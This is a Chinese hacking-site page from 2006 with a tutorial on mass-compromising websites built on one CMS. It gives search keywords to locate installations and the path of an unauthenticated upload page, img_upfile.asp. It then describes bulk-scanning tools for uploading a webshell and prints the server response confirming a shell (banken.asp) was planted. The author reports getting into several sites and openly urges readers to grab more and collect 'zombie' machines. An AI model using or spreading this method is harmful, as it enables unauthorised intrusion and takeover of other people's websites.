欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

批量拿WEBSHEL

  • 软件大小:3.87 MB
  • 软件语言:简体中文
  • 软件类型:综合教程
  • 软件授权:免费教程
  • 更新时间:2006-07-18
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

批量拿WEBSHEL软件介绍

              黑客动画吧 http://www.hack58.com

                   专业的黑客动画教程网站

                    免费学习黑客黑客技术

                       成为黑客不是梦。

                 打造国内最大的黑客动画网站

               注意:所有教程全部对外免费开放

===========================================================声明:千万别把国内的网站乱搞,只作学习交流。

大家好。我是专做菜鸟动画的菜鸟:半坑☆剑网  QQ:366138705

今天给大家介绍一款网站程序。是一款非常个性化的也是一款非常

好看的网站程序。就是我用的这一款网站程序。

我的小站:http://free.cngsh.com/slf5994/

好了。下面进入正题,前些天我在检测这个网站程序是否存在漏洞

的时候发现这个程序并不存在注入漏洞,而存在非常低级的上传漏

洞,不过我想应该还有别的其他的漏洞存在,希望有兴趣的朋友去

发掘,如果有新的发现请告知小弟一声,让我及时补漏。谢谢!!

我找了这个程序的关键字,最新资讯 本站信息统计 Flash 推荐

第一种方法:百度搜索,好多吧。在网址后面加上img_upfile.asp

如果出现:请先选择你要上传的文件 [ 重新上传 ]  就表示漏洞

存在。然后用明小子直接上传大马。这种方法我就不演示了。下面

来第二种简单的方法:用网站猎手批量查找。关键字填入这个

最新资讯 本站信息统计 Flash 推荐   然后在检测漏洞文件里选择

img_upfile.asp 打上勾下面开始搜索稍微等一下让他搜索一下。

我们先选一个试一下。这里可以直接上传大马,我把大马导进来

好了。点一下提交看一下返回信息

HTTP/1.1 200 OK
Date: Tue, 18 Jul 2006 12:20:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1240
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQRTDRR=DBKDLNFCNLLJJJPOMABOHNGC; path=/
Cache-control: private

<!--稻香老农制作http://www.5xSoft.com/-->
<SCRIPT LANGUAGE="JavaScript">
<!--
function killErrors() {
return true;
}
window.onerror = killErrors;
// -->
</SCRIPT>

<html>
<head>
<title>文件上传</title>
<LINK href="inc/style.css" rel=stylesheet>
</head>
<body leftmargin="0" topmargin="0" bgcolor="#FFFFFF" marginwidth="0" marginheight="0" >
<table width="350" border="1" cellspacing="10" cellpadding="5" bordercolor="#CCCCCC" height="250">
  <tr>
    <td width="388" bgcolor="#f7f7f7" align="center">
      <br>
      <div align="center">图片已经成功上传!请选择参数:<br>
        <br>
      </div>
       
      <table border="0" cellspacing="8" cellpadding="0" width="264">
        <form method="post" action="img_scdm.asp">
          <tr>
            <td><a href="banken.asp" target="_blank"><img src="banken.asp" width="100" border="0"></a></td>
            <td>
              <div align="center">
                <input type="hidden" value=banken.asp name="weizhi">
                <input type="submit" name="Submit" value="生成代码" class="buttonface">
              </div>
            </td>
          </tr>
        </form>
      </table>  
    </td>
  </tr>
</table>
</body>
</html>

看到了吧图片上传成功。我们打开看看,看到了吧。我的大马

进去看看进来了吧。再选一个试试,看到了吧又进去了。是不是很

简单啊。大家赶快去拿吧。教程就到这里,祝各位肉鸡多多。你也

可以找找别的关键字。好了,8888

  • 热门下载